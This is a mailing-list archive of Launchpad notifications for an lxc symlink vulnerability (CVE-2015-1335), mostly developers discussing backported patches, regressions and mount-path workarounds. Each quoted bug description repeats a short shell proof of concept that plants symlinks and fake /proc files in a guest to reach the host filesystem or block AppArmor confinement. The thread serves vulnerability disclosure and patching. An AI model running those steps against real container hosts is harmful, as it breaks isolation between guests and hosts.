Re: [Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Hi Serge, On Mo 04 Jan 2016 21:26:05 CET, Serge Hallyn wrote: > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): >> Hi Serge, >> >> sorry for getting back to this so late. >> >> On Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote: >> >> > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): >> >> >> today I worked on backporting available fixes for CVE-2015-1335 to LXC >> >> 0.7.x (as found in Debian squeeze-lts). >> >> >> >> The patch is attached, I am still in the testing-for-regressions phase. >> >> Can any of the LXC devs take a look at the patch and maybe see if it is >> >> suitable for Ubuntu 12.04, as well? >> > >> > Hi, >> > >> > So the thing to look for is any unconverted "mount" calls. It >> > looks like the lxc_setup_fs() calls to mount_fs() are not being >> > protected. So the contianer admin could attack through a /proc >> > symlink. >> >> Hmmm... ok... >> >> I just checked upstream Git and the location you refer to is not using >> safe_mount either there [1] > > Huh, that's odd. Yes those should be protected, since /proc etc in > the container could be symlinks. Do you mind sending a patch? I will work on the squeeze-lts / precise patch first and test that. If that works well, I will forward-port the change to current HEAD. >> Furthermore, it seems non-trivial to inform safe_mount about the root >> path from within lxc_init.c. >> >> Do you have any input on the following questions?: >> >>o Why mount_fs() in latest HEAD still using the mount() call >> instead of safe_mount()? >>o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()? > > You shouldn't need to - it's just '/' because you're already chrooted > there. > Ok. That will make it very easy. I get back to you with results within the month. Mike -- DAS-NETZWERKTEAM mike gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabr...@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): > Hi Serge, > > sorry for getting back to this so late. > > On Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote: > > > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): > > >> today I worked on backporting available fixes for CVE-2015-1335 to LXC > >> 0.7.x (as found in Debian squeeze-lts). > >> > >> The patch is attached, I am still in the testing-for-regressions phase. > >> Can any of the LXC devs take a look at the patch and maybe see if it is > >> suitable for Ubuntu 12.04, as well? > > > > Hi, > > > > So the thing to look for is any unconverted "mount" calls. It > > looks like the lxc_setup_fs() calls to mount_fs() are not being > > protected. So the contianer admin could attack through a /proc > > symlink. > > Hmmm... ok... > > I just checked upstream Git and the location you refer to is not using > safe_mount either there [1] Huh, that's odd. Yes those should be protected, since /proc etc in the container could be symlinks. Do you mind sending a patch? > Furthermore, it seems non-trivial to inform safe_mount about the root > path from within lxc_init.c. > > Do you have any input on the following questions?: > >o Why mount_fs() in latest HEAD still using the mount() call > instead of safe_mount()? >o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()? You shouldn't need to - it's just '/' because you're already chrooted there. > Thanks for any input. > > Mike > > [1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35 > -- > > DAS-NETZWERKTEAM > mike gabriel, herweg 7, 24357 fleckeby > fon: +49 (1520) 1976 148 > > GnuPG Key ID 0x25771B31 > mail: mike.gabr...@das-netzwerkteam.de, http://das-netzwerkteam.de > > freeBusy: > https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de > > -- > You received this bug notification because you are subscribed to the bug > report. > Matching subscriptions: lxc > https://bugs.launchpad.net/bugs/1476662 > > Title: > lxc-start symlink vulnerabilities may allow guest to read host > filesystem, interfere with apparmor > > Status in lxc package in Ubuntu: > Fix Released > > Bug description: > lxc-start shuffles around mounts using helper directory > /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) > > It then modifies mounts operating in guest root directory before > invoking init. As it does not check if all mount points are > directories, a malicious guest may modify its internal structure > before shutdown (or was created using manipulated image) and then when > started again, guest may > > * Access the whole host root filesystem > > * Block switching from lxc-start apparmor profile to lxc-container- > default > > > # Real putold before pivot-root (root fs will end here) > mkdir -p /x/lxc_putold > > # Faked putold > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc > touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts > > > # proc fake > mkdir -p /x/proc > umount /proc > rmdir /proc > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc > > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr > /usr/lib/x86_64-linux-gnu/lxc/x/proc/self > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status > > > The issue was also found during > https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html > > To manage notifications about this bug go to: > https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s
Re: [Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Hi Serge, sorry for getting back to this so late. On Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote: > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): >> today I worked on backporting available fixes for CVE-2015-1335 to LXC >> 0.7.x (as found in Debian squeeze-lts). >> >> The patch is attached, I am still in the testing-for-regressions phase. >> Can any of the LXC devs take a look at the patch and maybe see if it is >> suitable for Ubuntu 12.04, as well? > > Hi, > > So the thing to look for is any unconverted "mount" calls. It > looks like the lxc_setup_fs() calls to mount_fs() are not being > protected. So the contianer admin could attack through a /proc > symlink. Hmmm... ok... I just checked upstream Git and the location you refer to is not using safe_mount either there [1] Furthermore, it seems non-trivial to inform safe_mount about the root path from within lxc_init.c. Do you have any input on the following questions?: o Why mount_fs() in latest HEAD still using the mount() call instead of safe_mount()? o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()? Thanks for any input. Mike [1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35 -- DAS-NETZWERKTEAM mike gabriel, herweg 7, 24357 fleckeby fon: +49 (1520) 1976 148 GnuPG Key ID 0x25771B31 mail: mike.gabr...@das-netzwerkteam.de, http://das-netzwerkteam.de freeBusy: https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): > Hi all, > > today I worked on backporting available fixes for CVE-2015-1335 to LXC > 0.7.x (as found in Debian squeeze-lts). > > The patch is attached, I am still in the testing-for-regressions phase. > Can any of the LXC devs take a look at the patch and maybe see if it is > suitable for Ubuntu 12.04, as well? Hi, So the thing to look for is any unconverted "mount" calls. It looks like the lxc_setup_fs() calls to mount_fs() are not being protected. So the contianer admin could attack through a /proc symlink. > Greets, > Mike (aka sunweaver at debian.org) > > ** Patch added: "Backport fix for CVE-2015-1335 to LXC 0.7.x (Ubuntu 12.04 / > Debian squeeze-lts)" > > https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+attachment/4529631/+files/CVE-2015-1335.patch > > -- > You received this bug notification because you are subscribed to the bug > report. > Matching subscriptions: lxc > https://bugs.launchpad.net/bugs/1476662 > > Title: > lxc-start symlink vulnerabilities may allow guest to read host > filesystem, interfere with apparmor > > Status in lxc package in Ubuntu: > Fix Released > > Bug description: > lxc-start shuffles around mounts using helper directory > /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) > > It then modifies mounts operating in guest root directory before > invoking init. As it does not check if all mount points are > directories, a malicious guest may modify its internal structure > before shutdown (or was created using manipulated image) and then when > started again, guest may > > * Access the whole host root filesystem > > * Block switching from lxc-start apparmor profile to lxc-container- > default > > > # Real putold before pivot-root (root fs will end here) > mkdir -p /x/lxc_putold > > # Faked putold > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc > touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts > > > # proc fake > mkdir -p /x/proc > umount /proc > rmdir /proc > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc > > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr > /usr/lib/x86_64-linux-gnu/lxc/x/proc/self > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status > > > The issue was also found during > https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html > > To manage notifications about this bug go to: > https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Hi all, today I worked on backporting available fixes for CVE-2015-1335 to LXC 0.7.x (as found in Debian squeeze-lts). The patch is attached, I am still in the testing-for-regressions phase. Can any of the LXC devs take a look at the patch and maybe see if it is suitable for Ubuntu 12.04, as well? Greets, Mike (aka sunweaver at debian.org) ** Patch added: "Backport fix for CVE-2015-1335 to LXC 0.7.x (Ubuntu 12.04 / Debian squeeze-lts)" https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+attachment/4529631/+files/CVE-2015-1335.patch -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Regression fix fixes it on 14.04 LTS. Confirmed. Thanks! -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
The regression should be fixed with lxc 1.0.7-0ubuntu0.6. See http://www.ubuntu.com/usn/usn-2753-2/ for more details. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
We're getting lxc-start: utils.c: safe_mount: 1409 Mount of 'proc' onto '/usr/lib/x86_64-linux-gnu/lxc//proc' was onto a symlink! on all containers since we upgraded to 1.0.7-0ubuntu0.5 and they don't start. No container has /proc as a symlink. Plese tell me what information is required from me. We downgraded to 1.0.6-0ubuntu0.1 which works. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Does https://lists.linuxcontainers.org/pipermail/lxc- users/2015-September/010131.html point to the same problem? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
The problem lies in the ubuntu patch
http://archive.ubuntu.com/ubuntu/pool/main/l/lxc/lxc_1.0.7-0ubuntu0.5.debian.tar.gz
where this code
+ size_t start = croot ? strlen(croot) : 0;
+ if (strcmp(ws + start, target + start) != 0) {
+ ERROR("Mount onto %s resulted in %s\n", target, ws);
+ goto out;
+ }
in file 0003-CVE-2015-1335.patch checks if ws and start are the same.
According to the given error (which I forgot to paste above), ws and target ARE
different:
lxc-start: utils.c: ensure_not_symlink: 1384 Mount onto /usr/lib/x86_64
-linux-gnu/lxc//proc resulted in /usr/lib/x86_64-linux-gnu/lxc/proc
So target is
/usr/lib/x86_64-linux-gnu/lxc//proc
and ws is
/usr/lib/x86_64-linux-gnu/lxc/proc
Any hints how we could prevent the double slashing? Or would you just
"clean up" the path somehow?
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using helper directory
/usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
It then modifies mounts operating in guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or was created using manipulated image) and then when
started again, guest may
* Access the whole host root filesystem
* Block switching from lxc-start apparmor profile to lxc-container-
default
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr
/usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Looking through the top Google results on how to bind-mount a directory from the host-server into the lxc-server I notice that: * Stéphane Graber's "LXC 1.0: Advanced container usage [3/10]" post ( https://www.stgraber.org/2013/12/21/lxc-1-0-advanced-container-usage/ ) makes use of the **relative** mount point (in the lxc-server's fstab config file on the host-server) * Unfortunately the **official**(?) Debian LXC wiki page on "LXC" has the topic "Bind mounts inside the container" ( https://wiki.debian.org/LXC#Bind_mounts_inside_the_container ) which uses the lxc.mount.entry line in the config file **and** makes use of an **absolute** mount point. So those following the official Debian LXC documentation will be caught by this security patch. ;-( Just to be definite: changing all lxc.mount.entry mount points to **relative** paths is a current workaround. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- 